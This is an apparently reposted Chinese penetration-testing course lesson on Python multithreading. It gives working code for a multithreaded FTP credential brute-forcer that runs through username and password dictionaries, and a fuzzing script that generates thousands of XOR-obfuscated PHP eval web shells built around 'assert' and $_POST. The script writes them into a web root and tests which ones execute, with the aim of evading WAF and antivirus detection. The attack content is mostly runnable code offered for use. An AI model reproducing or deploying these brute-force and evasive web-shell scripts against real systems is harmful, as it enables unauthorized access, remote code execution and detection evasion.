思维导图

知识点

• 本课知识点：

  协议模块使用，Request 爬虫技术，简易多线程技术，编码技术，Bypass 后门技术

• 学习目的：

  掌握利用强大的模块实现各种协议连接操作(爆破或利用等)，配合 Fuzz 吊打 WAF 等

演示案例：

Python 开发-简单多线程技术实现脚本

**案例 1-Python 开发-简单多线程技术实现脚本 **

queue，threading 模块使用

quickeasyftpserver.zip

import ftplib
import queue
import threading


def ftp_check():
    while not q.empty():
        dic = q.get()
        dic = dic.split('|')
        username = dic[0]
        password = dic[1]
        ftp = ftplib.FTP()
        try:
            ftp.connect('10.13.135.87', 21)
            ftp.login(username, password)
            ftp.retrlines('list')
            print(username + '|' + password + '--------' + 'Logged in')
            ftp.close()
        except ftplib.all_errors as e:
            ftp.close()
            print(username + '|' + password + '--------' + 'failed')
            pass


if __name__ == '__main__':
    thread = 10
    q = queue.Queue()
    for username in open('user.txt'):
        for password in open('password.txt'):
            username = username.replace('n', '')
            password = password.replace('n', '')
            dlist = username + '|' + password
            q.put(dlist)

    for x in range(thread):
        t = threading.Thread(target=ftp_check)
        t.start()

Python 开发-利用 FTP 模块实现协议爆破脚本

案例 2-Python 开发-利用 FTP 模块实现协议爆破脚本

• 1.ftplib 模块使用

• 2.遍历用户及密码字典

• 3.尝试连接执行命令判断

```python
import ftplib
from ftplib import FTP

ftp=FTP()
for username in open('user.txt'):
    for password in open('password.txt'):
        username = username.replace('n', '')
        password = password.replace('n', '')
        try:
            ftp.connect('10.13.1.81', 21)
            ftp.login(username, password)
            ftp.retrlines('list')
            print(username + '|' + password + '--------'+'Logged in')
            ftp.close()

        except ftplib.all_errors as e:
            ftp.close()
            print(username + '|' + password +'--------'+ 'failed')
            continue
```

Python 开发-配合 Fuzz 实现免杀异或 Shell 脚本

案例 3-Python 开发-配合 Fuzz 实现免杀异或 Shell 脚本

• 1.免杀异或 Shell 原理讲解及开发思路（参考及举例：!^@,"?等）

• 2.基于 Fuzz 思路生成大量 Payload 代码并有序命名写入网站文件中

• 3.基于多线程实现批量访问 Shell 文件并提交测试是否正常连接回显

无字符特征马

PHP异或_

在PHP中，两个变量的值进行异或时，会先将两个变量的值转换为ASCII，再将ASCII转换为二进制，对两对二进制数据进行异或，异或完，再将结果转为ASCII，最后将ASCII转为字符串，即为最终结果。

ASCII表

0010 0001      33       !  
0010 1000      40		(
异或运算

0000 1001      9

手工测试

bypass脚本

""""
php异或
PHP之异或运算符---"^"
一.当均为数字时候
则先将数字转换成二进制数,然后再运算,运算规则也简单!
就是:
同则0,不同则1:运算的两个数在同一个位上相同则为0,不相同则为1!

二.当均为字符时
则先将字符转换成其对应的ASCII码,然后对产生的数字进行绝对值减运算!然后返回值转换成对应的字符!
如果两字符串长度不一样,则从两字符串起始位置起开始计算!之后多余的自动转换为空(视为一样)!

"""

import requests
import time

def xor_shell_creat():
    for i in range(0, 128):
        for j in range(0, 128):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(j) + "'"
            shell = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            # print(shell)
            filename = str(i) + 'xor' + str(j) + '.php'
            with open('E:/phpstudy/PHPTutorial/WWW/test/' + filename, 'a') as f:
                f.write(shell)
                print(filename + '写入成功')
                f.close()
            url='http://127.0.0.1/test/'+filename
            data={
                'x':'phpinfo();'
            }
            result = requests.post(url,data=data).content.decode('utf-8')
            if 'DESKTOP-1CDDLPV' in result:
                print('check->' + filename + '->ok')
            else:
                print('check->' + filename + '->no')
            # time.sleep(1)

if __name__ == '__main__':
    xor_shell_creat()

生成的shell很多！

bypassplus脚本

多进程—莫名速度好垃（不知道为什么好慢！哈哈）

import queue

import requests
import time
import threading

def xor_shell_check():
    while not q.empty():
        filename = q.get()
        url = 'http://127.0.0.1/test/' + filename
        data = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=data).content.decode('utf-8')
        if 'DESKTOP-1CDDLPV' in result:
            print('check->' + filename + '->ok')
        else:
            print('check->' + filename + '->no')
        time.sleep(1)



if __name__ == '__main__':
    q=queue.Queue()
    for i in range(0, 128):
        for j in range(0, 128):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(j) + "'"
            shell = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            # print(shell)
            filename = str(i) + 'xor' + str(j) + '.php'
            q.put(filename)
            with open('E:/phpstudy/PHPTutorial/WWW/test/' + filename, 'a') as f:
                f.write(shell)
                print(filename + '写入成功')
                f.close()
    for x in range(10):
        t = threading.Thread(target=xor_shell_check)
        t.start()

涉及资源：

quickeasyftpserver.zip
https://github.com/zhanye/fuzzdb
https://github.com/stemmm/fuzzDicts
https://www.cnblogs.com/liujizhou/p/11806497.html
python ftplib模块
https://blog.csdn.net/qq_41617034/article/details/104441032
https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码：
xiao

最后

以上就是文艺信封为你收集整理的第78天-Python 开发-多线程 Fuzz&Waf 异或免杀&爆思维导图知识点演示案例：涉及资源：的全部内容，希望文章能够帮你解决第78天-Python 开发-多线程 Fuzz&Waf 异或免杀&爆思维导图知识点演示案例：涉及资源：所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。